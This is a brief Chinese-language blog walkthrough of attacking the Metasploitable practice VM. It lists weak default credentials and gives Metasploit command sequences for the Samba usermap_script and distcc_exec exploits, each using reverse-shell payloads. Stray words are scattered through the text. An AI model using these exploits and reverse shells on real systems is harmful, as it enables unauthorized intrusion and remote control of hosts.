Samba&distcc 漏洞

漏洞測試確實是能夠的  當時把文章copy下來進行再進行測試。可是沒有copy到圖片,實驗是成功了,可是沒有那麼直觀。ubuntu

使用metasploit服務器

對metasploitable 靶服務器進行***ide

metasploitable 是ubuntu8.0的版本工具

 

neuss掃描到漏洞測試

139端口能夠獲取該系統主機名爲「METASPLOITABLE」,註釋「metasploitable server (Samba 3.0.20-Debian)」;unix

系統存在弱口令,用戶user、msfadmin密碼與用戶名同樣,使用net use命令可以創建鏈接查看共享資源。ftp開放版本信息 ProFTPD 1.3.1 Server (Debian),user這個用戶在ftp中也能夠使用;server

telnet服務開放,可肯定該系統爲Ubuntu 8.04,用戶user、msfadmin能夠登陸,並得到相應權限。若是不存在弱口令,經過截獲該telnet數據也能獲取用戶口令圖片

一個distcc漏洞ip

一個samba 共享服務漏洞資源

 

 

msf對靶服務器的工具

smb-samba 共享服務

 

use exploit/multi/samba/usermap_script

set payload cmd/unix/reverse

set rhost (ip address)

set lhost (ip address)

exploit

 

use exploit/unix/misc/distcc_exec

set payload cmd/unix/reverse_perl

set rhost  (ip address)

set lhost  (ip address)

exploit

 

distcc 成功 可是沒有root的權限

相關文章
相關標籤/搜索